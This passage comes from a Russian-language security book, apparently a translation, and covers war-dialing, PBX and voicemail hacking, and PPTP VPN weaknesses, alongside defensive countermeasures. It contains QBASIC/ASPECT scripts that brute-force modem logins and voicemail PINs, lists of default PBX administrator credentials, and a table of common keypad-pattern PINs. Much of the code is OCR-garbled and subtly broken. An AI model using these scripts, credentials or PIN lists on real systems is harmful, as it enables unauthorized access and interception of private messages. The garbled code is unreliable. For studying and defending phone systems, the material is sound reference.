    DO UNTIL EOF(l) PRINT #2, "dial DATA " + CHR$(34)
    + "5551235" + CHR$(34)
    LINE INPUT #1, in$
    in$ = LTRIM$(in$) + "^M"
    PRINT #2, "waitfor " + CHR$(34) + "
    Enter Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
    LINE INPUT #1, in$
    in$ = LTRIM$(in$) + "^М"
    PRINT #2, "waitfor " + CHR$(34) + "
    Enter Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
    LINE INPUT #1, in$
    in$ - LTRIM$(in$) + "^М"
    PRINT #2, "waitfor " + CHR$(34) + "
    Enter Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
    LOOP
    PRINT #2, "endproc"

    Двойная идентификация, неограниченное число попыток



    К третьему типу доменов зачастую относятся системы, которые, на первый взгляд, можно принять за системы первого домена. Однако для проникновения в систему третьего домена нужно угадать не только идентификатор пользователя, но и пароль. Поэтому проникновение в такую систему занимает больше времени, чем в системы из рассмотренных выше доменов. Сценарий проникновения в такую систему обычно более сложен, поскольку требует передачи не одной, а двух корректных строк. При этом возможно гораздо больше ошибок. Такой сценарий напоминает рассмотренные выше примеры. Пример поведения системы, относящейся к третьему домену, приведен в листинге 9.5, а программа на языке QBASIC для создания сценария ASPECT — в листинге 9.6.
    Листинг 9.5, Пример поведения системы, относящейся к третьему типу домена

    XX-Jcl-XX 09:55:08 91ХХХ5551234
    С: CONNECT 9600/ARQ/V32/LAPM
    Userr.ame: guest
    Password: xxxxxxxx
    Username: guest
    Password: xxxxxxxx
    Username: guest
    Password: xxxxxxxx
    Username: guest
    Password: xxxxxxxx
    Username: guest
    Password: xxxxxxxx
    Username: guest
    Password: xxxxxxxx

    Листинг 9.6. Пример программы на языке QBASIC (файл 5551235.ВАS)

    OPEN "5551235.was" FOR OUTPUT AS #2
    OPEN "LIST.txt" FOR INPUT AS #1
    PRINT #2, "proc main"
    PRINT 12, "dial
    DATA " + CHR$(34) + "5551235" + CHR$(34)
    DO UNTIL EOF(l)
    LINE INPUT #1, in$
    in$ = LTRIM$(in$) + "ЛМ" PRINT #2, "waitfor " + CHR$(34) + "
    Username:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + "
    guest" '+ CHR$(34)
    PRINT #2, "waitfor " + CHR$(34) + "
    Password:" + CHR$(34)
    PRINT tt2, "transmit " + CHR$(34) + in$ + CHR$(34)
    LOOP
    PRINT #2, "endproc"

    Двойная идентификация, ограниченное число попыток



    Четвертый домен является развитием третьего. Доя проникновения в систему четвертого домена требуется угадать имя пользователя и пароль при ограниченном числе попыток. После неудачного использования заданного числа попыток требуется восстановить разорванное соединение. Рассмотрим пример работы системы и программу генерации соответствующего сценария. В следующем листинге содержатся результаты атаки целевой системы. 

    XX-Jul-XX 09:55:08 91ХХХ5551234
    С: CONNECT 9600/ARQ/V32/LAPM
    Username: guest
    Password: xxxxxxxx
    Username: guest
    Password: xxxxxxxx
    Username: gues.t
    Password: xxxxxxxx
    +++

    А вот пример QBASIC-программы, генерирующей сценарий на языке ASPECT.

    OPEN "5551235.was" FOR OUTPUT AS #2
    OPEN "LIST.txt" FOR INPUT AS #1
    PRINT #2, "proc main"
    DO UNTIL EOF(l) PRINT #2, "dial
    DATA " + CHR$(34) + "5551235" + CHR$(34)
    LINE INPUT #1, in$
    in$ = LTRIMS(in$) + "ЛМ"
    PRINT #2, "waitfor " + CHR$(34) + "
    Username:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + "
    guest" + CHR$(34)
    PRINT #2, "waitfor " + CHR$(34) + "
    Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34)
    LINE INPUT #1, in$
    in$ = LTRIM$(in$) + "ЛМ" PRINT #2, "waitfor " + CHR$(34) + "
    Username:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + "
    guest" + CHR$(34)
    PRINT #2, "waitfor " + CHR$(34) + "
    Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + in$ + CHRS(34)
    LINE INPUT #1, in$
    in$ = LTRIM$(in$) + "AM"
    PRINT #2, "waitfor " + CHR$(34) + "
    Username:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + "
    guest" + CHR$(34)
    PRINT #2, "waitfor " + CHR$(34) + "
    Password:" + CHR$(34)
    PRINT #2, "transmit " + CHR$(34) + in$ + CHR$(34) LOOP PRINT #2, "endproc"


    1.gif

    Изображение: 

    2.gif

    Изображение: 

    3.gif

    Изображение: 

    4.gif

    Изображение: 

    5.gif

    Изображение: 

    6.gif

    Изображение: 

    2. Заключительные замечания



    Заключительные замечания


    Рассмотренные выше примеры относятся к реально существующим изученным авторами системам. Читатели могут встретиться с системами, требующими реализации в сценарии некоторых других особенностей. Разработка сценария для конкретной ситуации — это путь проб и ошибок. Для написания сценариев можно использовать и другие языки, однако этот метод был выбран для простоты. Напомним еще раз, что для реализации этого подхода сначала необходимо открыть файл журнала, поскольку после успешного написания сценария и его многочасовой работы будет очень обидно обнаружить полное отсутствие результатов.
    Читателей может заинтересовать вопрос: а как обстоят дела с соединениями ISDN (Integrated Services Digital Network)? Они по-прежнему используются во многих компаниях. Эти соединения в свое время предназначались для ускорения процесса соединения с корпоративной сетью. На сегодняшний день более быстрые каналы Internet во многом вытеснили соединения ISDN, однако последние все еще используются. Поэтому наряду с выявлением аналоговых линий обычных телефонных соединений имеет смысл проводить сканирование в поисках ISDN-модемов (или, как их часто называют, терминальных адаптеров (terminal adapters)). Авторы не имеют возможности привести полное описание процесса сканирования, направленного на выявление ISDN-соединений, в настоящем издании. Возможно, это будет сделано в следующем издании книги.
    Теперь самое время перейти к рассмотрению способов защиты перечисленных выше слабых мест.

    Защита удаленных соединений



    Не мудрствуя лукаво, приведем список вопросов, которые необходимо решить в процессе планирования защиты удаленных соединений своей организации. Этот список упорядочен по сложности реализации мероприятий (от простого к сложному). Поэтому в первую очередь будут устранены проблемы, относящиеся к домену ЛДП. Внимательному читателю этот список наверняка напомнит перечень мероприятий в рамках политики защиты удаленных соединений.
    1. Выполните инвентаризацию всех существующих линий удаленных соединений. На первый взгляд, это непростая задача. Однако перечитайте еще раз эту главу и обратите внимание на многократное повторение терминов "автопрозвон" или "сканирование телефонных номеров". Выявите все возможности неавторизованных удаленных соединений и избавьтесь от них всеми доступными средствами.
    2. Внесите всю информацию об удаленных соединениях в единый банк данных, вынесите его за пределы внутренней сети как банк ненадежных соединений (т.е. в демилитаризованную зону), а затем, применив методы выявления вторжений и технологию брандмауэров, ограничьте доступ к доверенным подсетям.
    3. Постарайтесь усложнить поиск аналоговых линий. Не назначайте их в одном диапазоне с телефонными номерами корпорации и не передавайте телефонные номера компании для регистрации в базе данных InterNIC. Защитите паролем информацию о телефонных номерах на АТС.
    4. Удостоверьтесь, что телекоммуникационное оборудование защищено физически: во многих компаниях такое оборудование содержится в общедоступных местах в незакрывающихся боксах.
    5. Регулярно проверяйте журналы регистрации программного обеспечения удаленных соединений. Особое внимание уделите информации о неудачных попытках установки соединений, активности в ночное время и необычным ситуациям. Используйте CalledD для записи номеров всех входящих соединений.
    6. Важно и просто! Для линий, применяемых в коммерческих целях, отключите вывод любых идентификационных данных и замените их на наиболее нейтральное приглашение. Рассмотрите возможность отправки предупреждающих сообщений о недопустимости несанкционированного использования.
    7. Предусмотрите для удаленного доступа двойную аутентификацию. Двойная аутентификация (two-factor authentication) предполагает ввод пользователем для получения доступа к системе двух типов данных: то, что он имеет, и то, что он знает. Примером являются одноразовые карточки паролей SecurlD компании Security Dynamics Technologies, Inc. Понятно, что зачастую такой подход финансово невыгоден. Однако это наилучший способ предотвращения большинства описанных выше проблем. В заключительном разделе главы приводится перечень компаний, выпускающих подобные продукты. В случае отказа от их услуг необходимо придерживаться жесткой политики назначения сложных паролей.
    8. Требуйте аутентификации по обратной связи. Аутентификация по обратному звонку (dial-back) подразумевает такую конфигурацию удаленной системы, при которой сразу же после установки соединения с любым из клиентов это соединение разрывается и возобновляется снова по инициативе самой удаленной системы по заранее известным координатам инициатора соединения. С целью обеспечения более высокой степени безопасности при установке обратного соединения желательно использовать отдельный модемный пул, для которого запрещены входящие соединения (средствами модемов или самих телефонных линий). Следует иметь в виду, что такое решение, видимо, неприемлемо для многих современных компаний с большим количеством мобильных пользователей.
    9. Удостоверьтесь, что доска объявлений компании не содержит секретных данных и не обеспечивает возможности удаленного изменения параметров учетной записи. Все описанные выше меры безопасности окажутся тщетными, если в отделе технической поддержки компании появится один новый энергичный человек с недобрыми намерениями.
    10. Сосредоточьте решение задач обеспечения удаленных соединений (начиная от факсов и заканчивая голосовой почтой) в руках одного отдела своей организации, уполномоченного решать задачи безопасности.
    11. Установите корпоративную политику для сотрудников центрального подразделения таким образом, чтобы полностью исключить обычные телефонные соединения. С этой целью установите внутренние мини-АТС, исключающие прямые входящие телефонные звонки и обеспечивающие лишь передачу исходящих факсов, доступ к электронной доске объявлений и т.п. Проведите тщательный маркетинг соответствующих систем и удостоверьтесь, что выбранная вами внутренняя мини-АТС удовлетворяет всем необходимым требованиям безопасности. В противном случае перейдите к п.1 и укажите поставщикам на бреши в защите, выявленные по методологии сканирования телефонных номеров.
    12. Вернитесь к п.1. Изящно сформулированные политики — это хорошо, однако единственный способ обеспечить следование этим политикам состоит в регулярном сканировании телефонных линий на предмет поиска новых брешей в защите. Авторы советуют проводить эту операцию не реже двух раз в год для компаний с 10000 телефонных линий, а желательно даже чаще. Итак, защита удаленных соединений включает 12 пунктов. Конечно же, некоторые из них достаточно сложно воплотить в жизнь, однако стоит приложить для этого максимум усилий. Многолетний опыт авторов по обеспечению безопасности больших корпораций свидетельствует о том, что большинство компаний хорошо защищено брандмауэрами, однако практически все имеют бреши в защите обычных телефонных линий, позволяющие добраться к самому сердцу информационной инфраструктуры. Не лишним будет повторить, что война с модемами — возможно, самый важный шаг к улучшению безопасности сети организации.

    Хакинг удаленных внутренних телефонных сетей РВХ



    На сегодняшний день по-прежнему существуют удаленные соединения с внутренними офисными телефонными сетями РВХ. На самом деле управление такими сетями чаще всего реализуется именно посредством удаленных соединений. Аппаратная консоль для доступа в сеть РВХ в настоящее время превратилась в сложную машину, доступ к которой обеспечивается через IP-сети и интерфейс клиента. При этом многие удаленные соединения с хорошо настроенными сетями РВХ были упущены из виду. Кроме того, поставщики систем РВХ зачастую требуют от своих клиентов установки удаленного доступа к РВХ для обеспечения удаленной поддержки. И хотя это требование не лишено смысла, многие компании относятся к нему очень упрощенно и просто оставляют модем постоянно включенным и подключенным к внутренней телефонной сети. На самом же деле нужно поступать следующим образом. При возникновении проблемы представитель компании должен позвонить в службу поддержки и при необходимости установить удаленное соединение с сетью РВХ, дать возможность службе поддержки устранить проблемы по удаленной связи, а затем срезу же отключить соединение. Поскольку многие компании оставляют соединения с сетями РВХ постоянно открытыми, это открывает широкие возможности для несанкционированного проникновения в систему путем сканирования телефонных номеров. Таким образом, хакинг соединений с сетями РВХ имеет ту же природу, что и взлом обычных удаленных соединений.

    Доступ к телефонной сети от компании Octel



    В телефонных сетях РВХ от компании Octel пароль администратора обязательно является числом. Иногда это играет очень важную роль. По умолчанию почтовый ящик системного администратора во многих системах компании Octel — 9999.

    XX-Feb-XX 05:03:56 *91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM
    Welcome to the Octel voice/data network.
    All network data and programs are the confidential and/or
    proprietary property
    of Octel Communications Corporation and/or others.
    Unauthorized use, copying, downloading, forwarding or
    reproduction in any form by any person of any network
    data or program is prohibited.
    Copyright (C) 1994-1998 Octel Communications Corporation.
    All Rights Reserved.
    Please Enter System Manager Password:
    Здесь необходимо ввести число
    Enter the password of either
    System Manager mailbox, then press
    "Return."

    Как видно из приведенного фрагмента интерфейса, для входа в сеть РВХ достаточно ввести либо числовой пароль, либо номер почтового ящика системного администратора.

    Система РВХ от компании Williams



    Как правило, работа в системе РВХ компании Williams происходит так, как показано ниже. При регистрации в сети зачастую требуется ввести номер пользователя. Обычно это пользователь первого уровня, номер которого — четырехзначное число. Очевидно, что подобрать нужное четырехзначное число не составляет труда.

    XX-Feb-XX 04:03:56 *91ХХХ5551234 С:
    CONNECT 9600/ARQ/V32/LAPM
    OVL111 IDLE 0
    >
    OVL111 IDLE 0
    >
    OVL111 IDLE 0
    >
    OVL111 IDLE 0

    Система Meridian



    На первый взгляд, система Meridian напоминает операционную систему UNIX. Однако воздержитесь от ее покупки! При вводе идентификатора пользователя maint с таким же паролем обеспечивается доступ к управляющей консоли. Тот же результат достигается при вводе идентификатора пользователя mluser с одноименным паролем Это две различные оболочки в стиле UNIX, предназначенные для ограничения взаимодействия с системой РВХ. Однако эти ограничения очень легко обойти.

    XX-Feb-XX 02:04:56 *91ХХХ5551234
    С: CONNECT 9600/ARQ/V32/LAPK
    login:
    login:
    login:
    login:

    Система ROLM PhoneMail



    Приведенное ниже поведение свойственно устаревшей системе ROLM PhoneMail. При входе в нее иногда даже отображаются соответствующие идентификационные маркеры.

    XX-Feb-XX 02:04:56 *91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM
    РМ Login>
    Illegal Input.

    Вот идентификаторы пользователей и пароли, используемые в системе ROLM PhoneMail по умолчанию.

    LOGIN: sysadrain PASSWORD: sysadmin
    LOGIN: tech PASSWORD: tech
    LOGIN: poll PASSWORD: tech

    Система ATT Definity 75



    Система ATT Definity 75 — одна из старейших систем РВХ, и ее приглашение выглядит как стандартное приглашение UNIX. Иногда при этом выводятся даже соответствующие идентификационные маркеры.

    ATT UNIX S75
    Login:
    Password:

    Приведем список используемых по умолчанию учетных записей и паролей для системы ATT Definity 75. По умолчанию для этой системы устанавливается большое количество готовых к работе учетных записей и паролей. Обычно эти учетные записи впоследствии модифицируются их владельцами либо по собственному желанию, либо после проведения аудита безопасности системы. Однако после модификации системы предлагаемые по умолчанию учетные записи могут снова быть восстановлены. Иными словами, измененные в исходной версии системы данные могут снова принять предлагаемые по умолчанию значения после одной или нескольких модернизаций системы. Вот список используемых по умолчанию в системе ATT Definity 75 имен и паролей.

    Login: enquiry Password: enquirypw
    Login: init Password: initpw
    Login: browse Password: looker
    Login: maint Password: rwmaint
    Login: locate Password: locatepw
    Login: rcust Password: rcustpw
    Login: tech Password: field
    Login: cust Password: custpw
    Login: inads Password: inads
    Login: support Password: supportpw
    Login: bans Password: bcms
    Login: bcms Password: bcmpw
    Login: bcnas Password: bcnspw
    Login: bcim Password: bcimpw
    Login: bciim Password: bciimpw
    Login: bcnas Password: bcnspw
    Login: craft Password: craftpw
    Login: blue Password: bluepw
    Login: field Password: support
    Login: kraft Password: kraftpw
    Login: nms Password: nmspw

    Защита сети РВХ средствами АСЕ-сервера



    Если вам встретится система, приглашение которой имеет следующий вид, — не стоит ломать копья: вероятнее всего, такую систему не удастся взломать, поскольку она защищена надежным механизмом на базе протокола АСЕ-сервера.

    XX-Feb-XX 02:04:56 *91ХХХ5551234 С: CONNECT 9600/ARQ/V32/LAPM
    Hello
    Password :
    89324123 :
    Hello
    Password :
    65872901 :

    Контрмеры против взлома систем РВХ



    Как и при защите удаленных соединений, необходимо максимально ограничить время работы модемов, применять сложные формы аутентификации (по возможности двойную аутентификацию), а также предусмотреть возможность отключения после нескольких неудачных попыток установки соединения.

    Прямой взлом систем голосовой почты



    В начале 90-х годов появились две программы, предназначенные для взлома систем голосовой почты: Voicemail Box Hacker 3.0 и VrACK 0.51. Авторы этой книги пробовали пользоваться ими, но оказалось, что эти программы подходят для взлома более ранних и менее защищенных систем голосовой почты. Программа Voicemail Box Hacker 3.0 предназначена только для работы с системами, использующими четырехзначные пароли. Программа VrACK 0.51 обладает некоторыми интересными возможностями, однако для нее сложно писать сценарии и, вообще, она рассчитана на старые архитектуры компьютеров на базе процессоров х86, а на современных компьютерах работает нестабильно. Возможно, упомянутые программы в настоящее время не поддерживаются потому, что попытки взлома систем голосовой почты предпринимаются нечасто. Таким образом, для взлома систем голосовой почты лучше всего использовать язык сценариев ASPECT.
    Сценарий взлома систем голосовой почты аналогичен сценарию взлома удаленных соединений, но основывается на другом принципе. В данном случае достаточно просто установить связь, а попытки регистрации не требуются. Такой сценарий можно реализовать даже вручную, но тогда поиск ограничится лишь последовательным перебором достаточно простых паролей и их комбинаций, которые могут использоваться в системах голосовой почты.
    Чтобы взломать систему голосовой почты вручную или с помощью простого сценария перебора паролей (здесь социальная инженерия не потребуется), необходимо знать основной номер для доступа к самой системе голосовой почты, код доступа к нужному почтовому ящику, включая количество цифр (обычно это 3, 4 или 5), а также иметь разумные предположения относительно минимальной и максимальной длины пароля почтового ящика. В большинстве современных систем используются стандартные предельные значения длины пароля, а также типичные предлагаемые по умолчанию пароли. Только очень беспечные компании не пытаются принять хоть какие-то меры защиты систем голосовой почты, однако, как показывает опыт, встречаются и такие. Однако при написании сценария будем исходить из предположения, что организация предпринимает некоторые меры защиты, и ящики голосовой почты имеют пароли.
    Сценарий взлома системы голосовой почты должен выглядеть примерно так, как в листинге 9.7. Сценарий в этом примере устанавливает соединение с системой голосовой почты, ожидает приветственного сообщения от автоответчика, например "Вас приветствует система голосовой почты компании X. Назовите, пожалуйста, номер почтового ящика", вводит номер почтового ящика, символ # для подтверждения окончания ввода, вводит пароль и символ подтверждения, а затем снова возобновляет попытку соединения. В этом примере проверяется шесть паролей для почтового ящика 5019. С помощью несложных приемов программирования можно легко написать сценарий, который последовательно выбирает пароли из некоторого словаря. Возможно, этот сценарий, придется подстраивать под конкретный модем. Да и вообще, один и тот же сценарий может отлично работать в одной системе и неудовлетворительно в другой. Поэтому необходимо внимательно следить за его работой. Протестировав сценарий на небольшом перечне паролей, можно запускать его для более объемного словаря.
    Листинг 9.7. Простой сценарий взлома системы голосовой почты на языке ASPECT для Procomm Plus

    proc main
    transmit "atdt*918005551212,,,,, 5019#,111111*,,50191,2222221,,"
    transmit "^M"
    WAITQUIET 37 HANGUP
    transmit "atdt*918005551212,,,,,5019#,333333#,,5019#,555555#,,"
    transmit "^м"
    WAITQUIET 37 HANGUP
    transmit "atdt*918005551212,,,,,5019#,666666*,,5019#,7777771,,"
    transmit "^M"
    WAITQUIET 37
    HANGUP
    endproc

    Число вариантов паролей голосовой почты всегда конечно. Конкретное количество возможных паролей зависит от максимально допустимой длины пароля. Чем длиннее пароль, тем больше времени может потребовать его взлом. При этом следует иметь в виду, что за процессом взлома требуется постоянно следить и слушать ответы системы голосовой почты. Однако умный взломщик может записать весь процесс взлома на магнитофон, тогда постоянное его присутствие при работе сценария не потребуется. Независимо от того, когда прослушиваются результаты работы сценария (сразу же или потом), большинство попыток ввода пароля окажутся безуспешными. Успешная попытка должна завершиться сообщением типа "В вашем почтовом ящике имеется X новых сообщений...". Заранее нельзя точно угадать, каким будет это сообщение. Количество возможных попыток находится в экспоненциальной зависимости от длины пароля. Поэтому для ускорения процедуры взлома можно использовать некоторые эмпирические закономерности.
    Итак, как же сократить время подбора номера? Во-первых, попробовать легко запоминаемые комбинации символов (цифр). Такие комбинации часто "навеяны" специфическим расположением кнопок телефона. Пользователи часто выбирают в качестве пароля последовательности расположенных определенным образом кнопок телефона, например, цифры 1235789 на клавиатуре телефона образуют букву Z. В табл. 9.1 приведены наиболее типичные образцы паролей, обусловленные взаимным расположением кнопок телефонного номеронабирателя. Это далеко не полный список, но с него стоит начать. Не стоит игнорировать и очевидные комбинации символов, например 111111, которые могут предлагаться в качестве пароля по умолчанию. Скорее всего, в процессе поиска будут обнаружены установленные ящики голосовой почты, но среди них могут быть и такие, которыми никто никогда не пользовался. Такое выявление почтовых ящиков имеет смысл только для аудиторов, старающихся заставить пользователей более строго соблюдать меры безопасности.

    Таблица 9.1. Типичные пароли системы Voicemail

    Последовательности цифр

    123456
    765432
    234567
    876543
    345678
    987654
    456789
    098765
    567890 
    678901
     789012 
    890123 
    901234 
    012345 
    654321
    109876 
    210987
     321098
     432109
     543210 
    123456789
     987654321
    Симметричные последовательности кнопок
    147741 
    258852
     369963 
    963369 
    159951
     123321
     
    456654 
    789987 
    987654 
    123369 
    147789 
    357753
    Цифры, расположенные в виде буквы Z
    1235789
     
    9875321
    Последовательности повторяющихся символов
    335577 115599
     
    775533 995511
    Цифры, образующие букву U
    Прямая буква U 
    Перевернутая буква U 
    Буква U "на правом боку"
    Буква U "на левом боку"
     
    1478963 
    7412369 
    3216789 
    1236987
    Цифры, образующие углы
    Нижний левый угол
     Нижний правый угол 
    Верхний левый угол
     Верхний правый угол

    14789
     78963 
    32147 
    12369
    Цифры, образующие букву O с разными начальными позициями обхода
    147896321
     47893214 
    78932147 
    896321478
     
     963214789 
    632147896
     321478963 
    214789632
    Цифры, образующие букву X с разными начальными позициями обхода
    159357 
    357159 
    159753
     
      753159 
    951357 
    357951
    Цифры, образующие символ + с разными начальными позициями обхода
    258456 
    258654 
    456258 
    456852
     
     654852 
    654258 
    852456 
    852654
    Цифры, образующие букву Z с разными начальными позициями обхода
    1235789 
    3215978
     
     9875321 
    1895123
    Поочередное нажатие клавиш из верхнего и нижнего ряда
    172839 
    391728 
    281739 
    718293 
    937182 
    827193
     
     283917 
    392817 
    173928 
    829371 
    938271 
    719382
    Поочередное нажатие клавиш из левого и правого ряда
    134679 
    791346 
    649731
     
     467913 
    316497 
    973164
    Взломав почтовый ящик, постарайтесь ничего в нем не нарушить. При попытке изменить пароль владелец ящика может получить уведомление. Очень немногие компании используют политику периодической смены паролей голосовой почты, а значит, существующие пароли меняются очень редко. Напомним, что за прослушивание сообщений, предназначенных для других адресатов, можно угодить в тюрьму. Поэтому авторы не советуют заниматься подобными вещами. Здесь лишь излагаются технические приемы, которые можно применять для взлома систем голосовой почты.
    И наконец, этот способ подбора паролей можно автоматизировать. Если "захватывать" аналоговый голосовой сигнал с помощью некоторого цифрового преобразователя сигналов или научиться записывать ответы системы, то можно прослушать результаты работы сценария в автономном режиме и не присутствовать при его реализации.

    Контрмеры против взлома систем голосовой почты



    Для защиты системы голосовой почты нужно принять строгие меры безопасности. Например, включите режим блокировки соединений после заданного числа неудачных попыток. Тогда взломщик не сможет за один сеанс проверить более пяти или семи паролей.

    Хакинг виртуальных частных сетей



    Телефонные сети являются достаточно надежными и разветвленными, поэтому удаленные соединения еще долго не выйдут из обращения. Тем не менее, им на смену уже приходят новые механизмы удаленного доступа — виртуальные частные сети  VPN (Virtual Private Network).
    Понятие виртуальной частной сети выходит за рамки отдельной технологии ил;; протокола, однако практически такие сети обеспечивают передачу (туннелирование) частных данных через Internet с использованием дополнительного шифрования. Основными преимуществами сетей VPN являются экономичность и удобство. При использовании существующих каналов связи Internet для создания удаленного офиса, общения с удаленными пользователями и даже удаленными партнерами, сложность сетевой инфраструктуры резко снижается.
    Виртуальную частную сеть можно организовать разными способами, начиная от использования защищенного протокола SSH, созданного в рамках модели открытого кода (Open Source Software) и заканчивая такими "собственническими" методами, как FWZ Encapsulation от компании CheckPoint Software (который будет описан ниже). Для организации VPN чаще всего применяется два следующих стандарта: протоколы IPSec (IP Security) и L2TP (Layer 2 Tunneling Protocol), пришедшие на смену более ранним версиям протоколов РРТР (Point-to-Point Tunneling Protocol) и L2F (Layer 2 Forwarding). Техническое описание этих достаточно сложных технологии не является задачей этой книги. Интересующиеся читатели могут обратиться за дополнительной информацией по адресу http: //www. letf .org.
    Термин туннелирование (tunneling) подразумевает инкапсуляцию одной (возможно зашифрованной) дейтаграммы в другой, например IP в IP (IPSec) или РРР в OKh (РРТР) Принцип туннелирования проиллюстрирован на рис. 9.7, где изображена виртуальная частная сеть между точками А и В (которые могут представлять собой как отдельные узлы так и целые сети). В передает пакет А (по адресу назначения "А ) через шлюз GW2 (Gateway 2), который может быть программно реализован в В. Шлюз GW2 выполняет инкапсуляцию этого пакета в другой и направляет вновь сформированный пакет шлюзу GW1. Шлюз GW1 удаляет временный заголовок и отправляет исходный пакет в место назначения А. При передаче через Internet исходный пакет может быть дополнительно зашифрован (пунктирная линия на рисунке).
    Технологии виртуальных частных сетей за последние несколько лет прошли хорошую практическую проверку и надежно утвердились в архитектурах открытых и частных сетей Многие провайдеры в настоящее время предоставляют услуги по организации виртуальных частных сетей для тех пользователей, которые не хотят создавать их сами. Вполне возможно, что в скором времени виртуальные частные сети полностью вытеснят обычные телефонные соединения в области удаленных коммуникаций. Однако такая популярность технологии VPN обращает на себя все более пристальное внимание хакеров, жаждущих новой добычи в изменяющихся условиях. Как виртуальные частные сети смогут противостоять такой угрозе? Рассмотрим несколько примеров.



    Рис. 9.7. Туннелирование одного трафика в другом — основной принцип работы виртуальных частных сетей

    Взлом протокола РРТР, реализованного компанией Microsoft



    Анализ протокола РРТР в реализации компании Microsoft был выполнен 1 июня 1998 года известным криптоаналитиком Брюсом Шнеером (Bruce Schneier) и знаменитым хакером Питером Маджем (Peter Mudge) (http://www.counterpane.com/pptp. html). Технический обзор результатов этого анализа, представленный Алефом Ваном (Aleph One) для журнала Phrack Magazine. В своем обзоре Алеф Ван вскрыл новые бреши в защите протокола РРТР, в том числе возможности обмана РРТР-сервера с целью получения данных аутентификации. Информацию об устранении недостатков в реализации протокола РРТР от компании Microsoft можно найти по адресу http://www.counterpane.com/ pptpv2-paper.html.
    Хотя указанная выше статья касается лишь реализации протокола РРТР компанией Microsoft, из нее можно извлечь полезные уроки относительно виртуальных частных сетей в целом. Поскольку технология виртуальных частных сетей призвана обеспечить дополнительную защиту информации, ее пользователи не подвергают никаким сомнениям возможности этой защиты. Поэтому статья Шнеера и Маджа должна послужить тревожным сигналом для таких беспечных пользователей. Рассмотрим некоторые вопросы, затронутые в этой статье.
    Приступая к чтению статьи Шнеера и Маджа, необходимо принимать во внимание сделанные ими допущения и имеющуюся среду для тестирования. Они изучали вопросы взаимодействия клиент/сервер на основе протокола РРТР, а не используемую шлюзами архитектуру сервер/сервер. Клиент, согласно их предположениям, подключался непосредственно к Internet, минуя удаленное соединение. Более того, некоторые из предлагаемых ими атак основываются на возможности беспрепятственного прослушивания сеанса РРТР. И хотя ни одно из сделанных предположений принципиально не влияет на полученные заключения, необходимо понимать, что требование свободного прослушивания сеансов таких коммуникаций само по себе является достаточно жестким и обеспечивает достаточную защиту соединения.
    Основные выводы статьи сводятся к следующему.

    •  Протокол безопасной аутентификации MS-CHAP компании Microsoft основывается на устаревших криптографических функциях (недостатки хэш-кодов LanManager и соответствующие программы взлома описаны в главе 5).
    •  Ключи сеансов, применяемые для шифрования передаваемых по сети данных, основываются на паролях пользователей, следовательно, практическая длина ключей снижается до 40 и 128 битов.
    •  Выбранный алгоритм шифрования данных сеанса (симметрический алгоритм RC4) значительно ослабляется за счет повторного применения ключей сеанса в направлениях отправителя и получателя, создавая опасность реализации стандартной криптографической атаки.
    •  Канал управления (TCP-порт 1723) для управляющих соединений не использует аутентификацию и абсолютно не защищен от атак, направленных на генерацию события DoS.
    •  Кодируются только сами данные, при этом злоумышленники могут свободно извлекать информацию из служебного трафика, передаваемого по каналу управления
    •  В статье делается предположение о том, что клиентные подключения к сети,через РРТР-серверы могут служить в качестве потайных входов в эти сети

    Устранение недостатков протокол а РРТР



    Означает ли все это, что над технологией виртуальных частных сетей разверзлись небеса? Абсолютно нет. Повторим еще раз, что все перечисленные недостатки касаются лишь конкретной реализации протокола компании Microsoft. Все они были устранены в сервисном пакете Service Pack 4 для серверов и клиентов. Более подробная информация об устраненных недостатках содержится в бюллетене Microsoft Security Bulletin MS98-012. Кроме того, в реализации для Windows 2000 протокол РРТР был существенно доработан. Теперь существует возможность использования протокола L2TP, основанного на IPSec. Для совместимости с новыми средствами обеспечения безопасности со стороны серверов РРТР-клиенты, работающие под управлением Win 9x, необходимо модернизировать с помощью Dial-Up Networking версии 1.3. Компания Microsoft подготовила подробный документ, касающийся протокола РРТР и защиты виртуальных частных сетей, который можно найти по адресу  http://www.microsoft.com/ntserver/zipdocs/vpnsecur.exe).

    В ответ на предпринятые компанией Microsoft действия Шнеер и Мадж опубликовали новую статью, в которой одобрили результаты устранения большинства из описанных ранее недостатков. Однако авторы замечают, что протокол MS РРТР по-прежнему основывается на пользовательских паролях в целях обеспечения разнообразия ключей.

    Однако наиболее важный вывод из статьи Шнеера и Маджа читается между строк: существуют достаточно способные люди, которые хотят и могут испытать на прочность и взломать виртуальные частные сети, несмотря на все заявления об абсолютной защищенности последних. Кроме того, возможности реатазации стандартных атак против операционной системы, под управлением которой работает виртуальная частная сеть (например, проблема хэш-кодов LanMan), а также просто плохие проектные решения (неавторизованные каналы управления или повторное использование ключей сеансов) могут свести на нет все остальные преимущества этой безопасной, на первый взгляд, системы.
    Статья Шнеера и Маджа содержит одно парадоксальное утверждение: на фоне жесткой критики реализации протокола РРТР компании Microsoft, авторы выражают оптимистичное мнение, заключающееся в том, что протокол IPSec станет основой технологии VPN благодаря открытости и прозрачности процесса его разработки. Однако описание протокола РРТР и даже его расширенной реализации компании Microsoft тоже имеется в Internet. Так что же выгодно отличает протокол IPSec? Ничего. Стоило бы с таким же пристрастием проанализировать и протокол IPSec. Именно это и сделал Брюс Шнеер (Bruce Schneier).


    7.gif

    Изображение: 

    3. Результаты анализа протокола IPSec



    Результаты анализа протокола IPSec


    Многие исследователи отмечают закрытость стандарта IPSec, встроенного в Windows 2000 компанией Microsoft. Однако такая закрытость имеет и свои преимущества. Поскольку никто толком не знает принципов работы протокола IPSec, то неизвестны и способы его взлома (устройства, работающие на базе протокола IPSec можно обнаружить путем прослушивания UDP-порта 500). Однако, как станет ясно из следующего раздела, завеса таинственности — не лучший фундамент для создания протокола безопасности.

    Результаты анализа, проведенного Шнеером (Schneier) и Фергюссоном (Ferguson)



